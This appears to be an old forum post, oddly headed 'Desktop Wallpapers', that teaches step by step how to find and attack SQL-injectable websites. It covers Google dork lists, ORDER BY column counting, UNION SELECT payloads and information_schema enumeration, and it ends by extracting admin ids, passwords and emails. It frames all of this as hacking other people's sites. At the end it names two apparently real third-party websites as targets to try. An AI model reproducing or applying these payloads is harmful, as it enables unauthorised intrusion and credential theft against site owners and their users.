DESKTOP WALLPAPERS

1st Of All How To Find SQL vulnerable sites to Make An Attack And Hack Them?

1st Download This File

http://rapidshare.com/files/317187675/dork.txt

Now Open The text File You Will See Plenty Of Codes

Now Open Google And Copy Paste Any 1 Line From The Above File

When Google Opens The Result You Would See Many Sites And Those Will Be Open To Attack

So now we will take an example of a website which we assume is legit vulnerable

http://www.example.pl/news.php?id=-17' add ' to the end to check if its vulnerable

If it gets error then its vulnerable so i remove the ' and do

http://www.example.pl/news.php?id=17 order by 1--
http://www.example.pl/news.php?id=17 order by 2--
http://www.example.pl/news.php?id=17 order by 3--

If we dont get error so we will continue

When we finally get an error when we do like below

http://www.example.pl/news.php?id=17 order by 13--

so this tells us 13 columns dont exist, so there must be 12 columns in the database

Note:- columns will be different for each site. they could be even more then 100 or less then 10 so u have to continue checking columns until u find the last one

So now we will use UNION SELECT function as shown below


http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- (note make sure to add a - in between = 17 like =-17 in the ID)


Hit enter


Lets assume numbers 4 and 5 appear,this means data can be extracted from numbers for and five ( You may see any numbers on different sites )


Replace 4 in the url with @@version so it now looks like


http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12--


Hit enter

and lets assume we get this SQL

5.0.32-Debian_7etch8-log


^this will be the mysql version running,So its running version 5 that helps alot,(versions 4 and below we have the guess the table name's)

remember mysql will be different in most of the sites


Where we put @@version (4th spot)

Replace it with

group_concat(table_name)

^^^
This gets table name

like

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12--


And at the end of union select string remove the -- after the 12 and add


+from+information_schema.tables+where+table_schema=database()--


So it now will look like

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--

You will see something like this or similar to this


x_admins,x_articles,x_ban,x_banners,x_banners_info,x_comments,x_file_categories, ​ x_file_data,x_forum_a,x_forum_b,x_forum_c,x_gbook,x_infopages,x_links_categories ​ ,x_links_data,x_mails,x_menu,x_news,x_poll_data,x_poll_desc,x_pw,x_topic,x_users ​



Now replace group_Concat(table_name) with group_concat(column_name) and everything after union select 5,6,7,8,9,10,11,12 with
+from+information_schema.columns+where+table_name='x_admins'--

so it goes from

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--

TO

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 +from+information_schema.columns+where+table_name='x_admins'--




we see id,nick,pass,name,added,access,mail,stat

Learn about grouping at this point but now we add


group_concat(id,0x3a,pass,0x3a,mail) to where the group_concat(column_name) is and add +from+x_admins-- after 10,11,12

So the string becomes

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(id,0x3a,pass,0x3a,mail),5,6,7,8,9,10,11,12 +from+x_admins--



At this point we obtain the admins password.

And its done

See you will not be able to do the steps successfully all the time becoz site script and sql differ from each other but the basic remains as i posted

Note:- If the version is lower than 5..Then you need to guess the table name..

Here is some table name list for you.

http://rapidshare.com/files/317214866/table.txt

So i will pick one for an example for you.

Iwill choose tblclients. you will add this at the end before this "--".
it will goes like this..

article_viewer.php?id=-5%20UNION%20SELECT%201,2,@@VERSION,4,5,6,7,8,9,10,11,12+from+tblclients--


U can try on sites like http://www.yaseenintloep.com.pk/formal.php?pageid=8http://www.shaadiwaadi.com/index.php?id=26